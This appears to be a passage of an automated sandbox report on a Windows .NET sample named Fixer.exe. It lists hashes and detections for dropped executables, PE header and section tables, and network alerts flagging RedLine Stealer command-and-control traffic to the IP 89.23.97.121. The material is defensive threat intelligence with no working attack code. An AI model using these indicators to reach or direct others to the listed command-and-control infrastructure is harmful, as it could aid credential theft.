                                                                                                                                                                                                                                              Size (bytes):471107
                                                                                                                                                                                                                                              Entropy (8bit):6.664478759847773
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:G8qTx8oaV9Ta1UGwUVBRIYRrpyLvx5aatth:kaVVa+GwyHvlGv/jX
                                                                                                                                                                                                                                              MD5:2E2BF344AC14353A679CCDD682273BE0
                                                                                                                                                                                                                                              SHA1:92ED1E2EAE84405DF7FE700BA108F04E498C6CB1
                                                                                                                                                                                                                                              SHA-256:9CD1297AB41D9DACADA4F728935BECB08533480326BAB6687DD8BE2DB76F91E7
                                                                                                                                                                                                                                              SHA-512:012E5031B9D413547AA98E6C61A2CA0E658C471D8EEAE4AAA16F100C30BF98C74929D4589A722AE7914BBFD9E60314BA10757BD93E4E521570D4B153CAB21FC7
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):398579
                                                                                                                                                                                                                                              Entropy (8bit):6.187747366960712
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:udqn92Oey3hWpanij1Ck6QQWFti9Ez2bDLujYzYm12JLXUsGytEqQ:uIn92O335ijomti9EzsOJL+UEq
                                                                                                                                                                                                                                              MD5:094EBE271C9334745C238FC2BA77FD38
                                                                                                                                                                                                                                              SHA1:3BC39EE84886A41A621F4B3047FE437DEE266269
                                                                                                                                                                                                                                              SHA-256:59B32D9062B72F23B8CB1F6D5F137E07E40B2F59CF46E548C22721CDE8568474
                                                                                                                                                                                                                                              SHA-512:79BBAA9950C9B0A82B486E88259EFCF081B0B4EB3F50C00DF969A18F8035EEC46AFD65F42D31DF5E119A548FB2CF6C19A79B4C2194DABDD331E89A13AECE9D66
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):753276147
                                                                                                                                                                                                                                              Entropy (8bit):0.0077968863233513885
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              SHA1:9EFE8FE8C404ADA4281DA0DBE3B26306C9B7A95B
                                                                                                                                                                                                                                              SHA-256:1E434C27665EF7E8E28D3E22C3683F4DE0C1329D01E4CD4D4199DABEB25BA6D4
                                                                                                                                                                                                                                              SHA-512:16CC45C26EC9EBDB83CA353D67C42AD40048AD43DD34C6106FC7CF86968C381339046A90C6A39418E00E8E42088778F4EE76F146A8C8B60F7D1E00D310E2DCC5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):735522883
                                                                                                                                                                                                                                              Entropy (8bit):0.009974453903565014
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              SHA1:D3F577D3DBAD9F94B99A6EE6731D9D9AF5ACE49C
                                                                                                                                                                                                                                              SHA-256:EF11384917C68D635A16C5DDAD10DB19EA021B5B0391610D89B777B147713551
                                                                                                                                                                                                                                              SHA-512:09B427512396E4B46F1E037B00661DF17612CD95CEB5C6CAC28D9F6D75133189FCFA293371AA50086122786A27D7C42161F439381C800D775B288DA64FEBA0DF
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):5.081407378293017
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              File name:Fixer.exe
                                                                                                                                                                                                                                              File size:307'712 bytes
                                                                                                                                                                                                                                              MD5:2acda1f917022e9e8081ad69b15330c6
                                                                                                                                                                                                                                              SHA1:3bad975d496a0066d64470e4ae1002794581c4f8
                                                                                                                                                                                                                                              SHA256:7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
                                                                                                                                                                                                                                              SHA512:958b0298777807763a0abd44c7a9252838625a2cd73eda6537d7a453aa5ed434282dbec6a126899bb35912e1615fa4e77461a2c1b4f7912d91a35fb44b439d93
                                                                                                                                                                                                                                              SSDEEP:3072:icZqf7D34qp/0+mAGkyYaxQwgrRB1fA0PuTVAtkxza3R0eqiOL2bBOA:icZqf7DIqnm2lB1fA0GTV8kk8L
                                                                                                                                                                                                                                              TLSH:B5645A5833E8C910DA7F4775D861D67093B0BCA3A552E70B4FC4ACAB3D32740EA51AB6
                                                                                                                                                                                                                                              Icon Hash:4d8ea38d85a38e6d
                                                                                                                                                                                                                                              Entrypoint:0x43029e
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30244 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x32000 | 0x1c9c6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x50000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2e2a4 | 0x2e400 | fde816a3b3ae0ecacd5e5ab05f73a727 | False | 0.47479413006756754 | data | 6.186366061893661 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x32000 | 0x1c9c6 | 0x1ca00 | a8cf3f8ff27a4a736ba8fb433d91107f | False | 0.2380765556768559 | data | 2.615031395625776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x50000 | 0xc | 0x200 | ad0a6b4525092f96ee7808055cdae654 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x32220 | 0x3d04 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9934058898847631
RT_ICON | 0x35f24 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m |  |  | 0.09013072282030049
RT_ICON | 0x4674c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m |  |  | 0.13905290505432216
RT_ICON | 0x4a974 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m |  |  | 0.17033195020746889
RT_ICON | 0x4cf1c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m |  |  | 0.2045028142589118
RT_ICON | 0x4dfc4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m |  |  | 0.24645390070921985
RT_GROUP_ICON | 0x4e42c | 0x5a | data |  |  | 0.7666666666666667
RT_VERSION | 0x4e488 | 0x352 | data |  |  | 0.4447058823529412
RT_MANIFEST | 0x4e7dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T11:24:21.358270+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:21.358270+0100 | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:21.630664+0100 | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 1 | 89.23.97.121 | 1112 | 192.168.11.20 | 49748 | TCP
2025-01-08T11:24:26.669865+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:27.070524+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:27.708030+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:28.033899+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:28.848988+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.121943+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.393622+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.695937+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:29.970275+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:30.244400+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:30.586256+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:30.939569+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:31.213342+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:31.488362+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:31.806733+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.019673+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.293505+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.566799+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:33.845047+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:34.117796+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:34.472435+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:34.743199+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:37.512019+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:37.783860+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:40.760334+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.20 | 49749 | 89.23.97.121 | 1911 | TCP
2025-01-08T11:24:41.963009+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP
2025-01-08T11:24:42.273238+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.11.20 | 49748 | 89.23.97.121 | 1112 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:27.341856956 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:27.385854006 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:27.708029985 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:27.979675055 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.026299000 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.033899069 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.304447889 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.304657936 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.304826021 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.304996967 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.575299978 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.575309992 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.575557947 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.575778008 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.845944881 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.846404076 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.846410990 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.846677065 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.847610950 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:28.848988056 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.119815111 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.121942997 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.392846107 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.393621922 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.664488077 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.695936918 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.967052937 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:29.970274925 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.241204023 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.244400024 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.516324043 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.556989908 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.586256027 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.857079029 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.900662899 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:30.939568996 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:31.211878061 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:31.213341951 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:31.485394001 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:31.488362074 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:31.760467052 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:31.806732893 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.019673109 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.290851116 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.293504953 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.565450907 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.566798925 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.838087082 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.845046997 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.845117092 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.845139027 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:33.845352888 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117563963 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117573023 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117795944 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117836952 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117847919 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117861986 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.117963076 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.118386984 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.388489008 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.389131069 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.431168079 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.472434998 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.472470045 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.472528934 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.472726107 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.472887993 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.742980957 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743138075 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743199110 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743377924 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743438959 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743544102 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743702888 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.743851900 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.744029045 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745048046 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745273113 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745452881 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745584011 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745615959 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745749950 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745778084 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745790958 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745922089 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.745981932 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.746094942 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.746263981 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.746303082 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:34.746586084 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.568845987 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.568850994 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.568995953 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.569084883 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.569093943 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.569166899 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.569328070 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.569410086 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.570223093 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.570233107 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.570493937 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.570765972 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.571613073 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.571904898 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.571912050 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.572873116 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.573163986 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.573447943 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.573712111 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.574598074 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:35.574608088 CET11124974889.23.97.121192.168.11.20
